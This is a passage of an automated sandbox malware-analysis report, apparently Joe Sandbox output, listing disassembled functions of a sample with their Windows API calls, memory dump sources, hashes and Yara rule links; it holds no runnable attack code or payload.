                                  • Instruction ID: e2f409fb53aec5c17ccbf3e1a26e35ab223a41ad27f3796d946f1401872551dc
                                  • Opcode Fuzzy Hash: 559e00e182da1efc1ee844143e54b5289b8d7ac1d90be60e135f66b04a4fc01f
                                  • Instruction Fuzzy Hash: 90E01AB6C0010CAACB04FBA5D8528AEBB78AA50204F0045BEA91567282EA346A149799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ED65 Relevance: 1.5, APIs: 1, Instructions: 9COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___crtInitializeCriticalSectionEx.LIBCPMT ref: 0040ED72
                                    • Part of subcall function 0040F42F: InitializeCriticalSectionEx.KERNELBASE(?,?,?,?,?,0040ED77,?,00000FA0,00000000), ref: 0040F451
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalInitializeSection$___crt
                                  • String ID:
                                  • API String ID: 348918074-0
                                  • Opcode ID: bb96c681368f379992a3cfb1baa5672ed95cdbd770d999199ec2d46a85b23992
                                  • Instruction ID: 81ccd7ab2f72141b8f239c17b5140be84f2a54311d37a3273f4849baef594561
                                  • Opcode Fuzzy Hash: bb96c681368f379992a3cfb1baa5672ed95cdbd770d999199ec2d46a85b23992
                                  • Instruction Fuzzy Hash: 5EB0927168420C36D9202582EC03B263A184751B64E800035BA0C2CAE1A9A265A8508A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0024073A Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00240777
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_240000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                  • Instruction ID: 3b4288ff085a1ff28d00ca07eb53c5ad4003a470c6c7735394b11ded1c37d44a
                                  • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                  • Instruction Fuzzy Hash: 33110670D10219AFDB04EFA8CC89BAEFBB4EB04304F2084A5EA15B7291D2755A949F91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 004270EB Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 254COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • GetACP.KERNEL32(?,?,?,?,?,?,0041B708,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 004271AA
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0041B708,?,?,?,00000055,?,-00000050,?,?), ref: 004271E1
                                  • _wcschr.LIBVCRUNTIME ref: 00427275
                                  • _wcschr.LIBVCRUNTIME ref: 00427283
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00427344
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                  • String ID: utf8
                                  • API String ID: 4147378913-905460609
                                  • Opcode ID: 59a1193c5fd235517ba1f104041047f1f23dfd82996aed35ec7635ed8f74d4e5
                                  • Instruction ID: 9fd03cb1456cb38658fe38fed3da33ca446464b993f4dd20f80c9fffb3498d2f
                                  • Opcode Fuzzy Hash: 59a1193c5fd235517ba1f104041047f1f23dfd82996aed35ec7635ed8f74d4e5
                                  • Instruction Fuzzy Hash: C9710771704222AAEB24AB75EC42BB773A8EF45704F94406FF905D7281EB7CE841C669
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00427884 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00427B96,00000002,00000000,?,?,?,00427B96,?,00000000), ref: 0042791D
                                  • GetLocaleInfoW.KERNEL32(?,20001004,00427B96,00000002,00000000,?,?,?,00427B96,?,00000000), ref: 00427946
                                  • GetACP.KERNEL32(?,?,00427B96,?,00000000), ref: 0042795B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: 8e23217b7e23a1a0e8f98d1ad00557f1d828ea6f4db9ff5ed9e711d7bd3462b8
                                  • Instruction ID: 5290885cfc00b83c3f91c7a702aa8d530f52b881acbc8a7619dbb9977bacb9d1
                                  • Opcode Fuzzy Hash: 8e23217b7e23a1a0e8f98d1ad00557f1d828ea6f4db9ff5ed9e711d7bd3462b8
                                  • Instruction Fuzzy Hash: 4121F8B2B0C220E6FB349F25E844A9777A7AF54B50BD68036E809D7310E736DD81C358
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00427A60 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00427B68
                                  • IsValidCodePage.KERNEL32(00000000), ref: 00427BA6
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00427BB9
                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00427C01
                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00427C1C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                  • String ID:
                                  • API String ID: 415426439-0
                                  • Opcode ID: d7d38c1dbc8375ba807f56712a0814b1f73bb466e4f4d3c4fc6ce9b0d1ddd85b
                                  • Instruction ID: b7a06ed6196ae2854c6a8c05903e04cb68c936f492ae398200924b9b6a2e2900
                                  • Opcode Fuzzy Hash: d7d38c1dbc8375ba807f56712a0814b1f73bb466e4f4d3c4fc6ce9b0d1ddd85b
                                  • Instruction Fuzzy Hash: 6D51A771B04229AFDB10DFA6EC41ABFB7B8FF05704F94446AE900D7290E7789941CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004194C0 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 232060ec543fad4a72ddf1d301f3bb8b6b25618b481cda5dcf5b8ab73e5fd112
                                  • Instruction ID: 425e93765f09731f267595844137da8e3b1562ec2c5d14cc36b7def31baa011b
                                  • Opcode Fuzzy Hash: 232060ec543fad4a72ddf1d301f3bb8b6b25618b481cda5dcf5b8ab73e5fd112
                                  • Instruction Fuzzy Hash: 20023A71E002199BDF14CFA9C9906EEBBB1FF49314F24826AD919A7380D735AE41CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00427508 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042755C
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004275A6
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042766C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale$ErrorLast
                                  • String ID:
                                  • API String ID: 661929714-0
                                  • Opcode ID: 69b6f7ddbd3a9f8ea5355250b2a978afd14761d76fc5116f809e0c7f08cf6bd4
                                  • Instruction ID: 6baf8c18dc1f55ad0d47fbf7d8bf695c2ddd039b4b48eed2d966520e36bc498a
                                  • Opcode Fuzzy Hash: 69b6f7ddbd3a9f8ea5355250b2a978afd14761d76fc5116f809e0c7f08cf6bd4
                                  • Instruction Fuzzy Hash: F361D6717045279FDB289F29EC82BB6B3A8EF44314F50407BED05C6285EB78E981CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414847 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0041493F
                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00414949
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00414956
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  • Opcode ID: db0a831cd5d3846c1bd6a179f546bdaf9b7496a934998344df972b8bbf83d0f2
                                  • Instruction ID: a6ab7baee91daf00c45c9674bb5eda2a48d05529ba7cf81acb27413b0c70ef6e
                                  • Opcode Fuzzy Hash: db0a831cd5d3846c1bd6a179f546bdaf9b7496a934998344df972b8bbf83d0f2
                                  • Instruction Fuzzy Hash: 6831C274901228ABCB21DF65DD89BDDBBB8BF48310F5041EAE40CA6251EB749FC58F48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004273E2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • EnumSystemLocalesW.KERNEL32(00427508,00000001,00000000,?,-00000050,?,00427B3C,00000000,?,?,?,00000055,?), ref: 00427454
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID: <{B
                                  • API String ID: 2417226690-2250851687
                                  • Opcode ID: 0bb380edbab6e1d20b20a151b663101098ac9e08026a598f849db23246bb16a3
                                  • Instruction ID: 426917441abd933cfeeb7a794309b729f04694a37d7b83ac7b2bef0d4af0830d
                                  • Opcode Fuzzy Hash: 0bb380edbab6e1d20b20a151b663101098ac9e08026a598f849db23246bb16a3
                                  • Instruction Fuzzy Hash: 2E1125363043115FDB18AF39D8916BABB91FF84368B54842EE98687B40D379B942C744
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FF08 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                  Download Yara Rule
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040FF21
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FeaturePresentProcessor
                                  • String ID:
                                  • API String ID: 2325560087-0
                                  • Opcode ID: b6fa829e39647cb617a1f4bdccb6bd6d575dbd688f6fe19625a85731fa4936b0
                                  • Instruction ID: d5e4f07369dc952483bb1754e94aacd7f4753de19275b0a77e62bdb20847f451
                                  • Opcode Fuzzy Hash: b6fa829e39647cb617a1f4bdccb6bd6d575dbd688f6fe19625a85731fa4936b0
                                  • Instruction Fuzzy Hash: 59513AB5D002058BEB24CF69D98569EBBF4FB49314F14857BD405E7390E378A984CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042775B Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004277AF
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$InfoLocale
                                  • String ID:
                                  • API String ID: 3736152602-0
                                  • Opcode ID: c2f7c5169bef2f566317d06d972f8ba724f516edf24a4ddb06fc31436cb3bc47
                                  • Instruction ID: fd968a8983cb7a16fdf0a52b3ee4427ff55774bd5275b93e23ed8d15ea5475f4
                                  • Opcode Fuzzy Hash: c2f7c5169bef2f566317d06d972f8ba724f516edf24a4ddb06fc31436cb3bc47
                                  • Instruction Fuzzy Hash: A021B671719126ABEB18AF25EC45ABB73A8EF45304B50407FFD01D7241EB78AD40CA58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042798A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00427724,00000000,00000000,?), ref: 004279B6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$InfoLocale
                                  • String ID:
                                  • API String ID: 3736152602-0
                                  • Opcode ID: 9cf7c9006e2573a468f0599081d11a1f62291e2b115d01cf04b9516f0e723a22
                                  • Instruction ID: 7cffcfd60a17ff24cfe79b7ddb74c6e0a7350457810ca011ae1e8eff62d2730f
                                  • Opcode Fuzzy Hash: 9cf7c9006e2573a468f0599081d11a1f62291e2b115d01cf04b9516f0e723a22
                                  • Instruction Fuzzy Hash: 0B01DB737042227FEF185A25DC457BB3754EB40354F55452AAC46E3180DA78EDC2C695
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042747D Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • EnumSystemLocalesW.KERNEL32(0042775B,00000001,00000000,?,-00000050,?,00427B04,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 004274C7
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  • Opcode ID: 3bcf599ed15c1fa5474c31f6c2ad94d4c5c4ed7eb0755f825d6f174fb8ca7859
                                  • Instruction ID: 246f45f633c6bbc0ca4ab0c7ea96dad62beebf4c923d342dc090771111b61ec1
                                  • Opcode Fuzzy Hash: 3bcf599ed15c1fa5474c31f6c2ad94d4c5c4ed7eb0755f825d6f174fb8ca7859
                                  • Instruction Fuzzy Hash: 49F028363043146FDB146F36EC81A767F90EB80368B44842EFA4587650C3B55C42C618
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041DF33 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00417EBA: EnterCriticalSection.KERNEL32(-0002D51A,?,00419E36,00000000,0043D948,0000000C,00419DFE,?,?,00417F63,?,?,?,0041D2E2,00000001,00000364), ref: 00417EC9
                                  • EnumSystemLocalesW.KERNEL32(0041DF26,00000001,0043DBB8,0000000C,0041E31D,00000000), ref: 0041DF6B
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                  • String ID:
                                  • API String ID: 1272433827-0
                                  • Opcode ID: 07205a432e85c8943ade8e7bd22c6e912f9cff66b39770fabf2230a6bb45d11c
                                  • Instruction ID: c37ffa3f29b47a5c9c5340eda0e2d768edaf37e25af0b028b3e1282320b733f8
                                  • Opcode Fuzzy Hash: 07205a432e85c8943ade8e7bd22c6e912f9cff66b39770fabf2230a6bb45d11c
                                  • Instruction Fuzzy Hash: 02F087B6A00200DFD700EF99E802B897BF0EF48724F10416AF4059B2A1C7B95A81CF48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00427397 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • EnumSystemLocalesW.KERNEL32(004272F0,00000001,00000000,?,?,00427B5E,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 004273CE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  • Opcode ID: 827e35003f877db9d391084e3b72472651126ad194affcd5d6624c04b4f4dc67
                                  • Instruction ID: 7df8905e2785786b5a1b65724aab47b2c6132b9bf72ec2bd285382f301d25dd5
                                  • Opcode Fuzzy Hash: 827e35003f877db9d391084e3b72472651126ad194affcd5d6624c04b4f4dc67
                                  • Instruction Fuzzy Hash: CAF0553630021457CB14DF3AE80566B7F90EFC1724B46409AEE09CB240C7B99883C7A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041E421 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0041C27E,?,20001004,00000000,00000002,?,?,0041B870), ref: 0041E455
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: 422c9aec0e9ed5de092439f91dbffd308a65c3da5af1662edbc6c05bd1834994
                                  • Instruction ID: e1ee9e76dd0b48878eb52c949d8d92150b3e75af0069db0f6a3d40fb4f237f14
                                  • Opcode Fuzzy Hash: 422c9aec0e9ed5de092439f91dbffd308a65c3da5af1662edbc6c05bd1834994
                                  • Instruction Fuzzy Hash: 57E04F39600128FBDF222F63DC08EEE3F1AEF44761F044426FD0665260CB758961AAD9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042194B Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
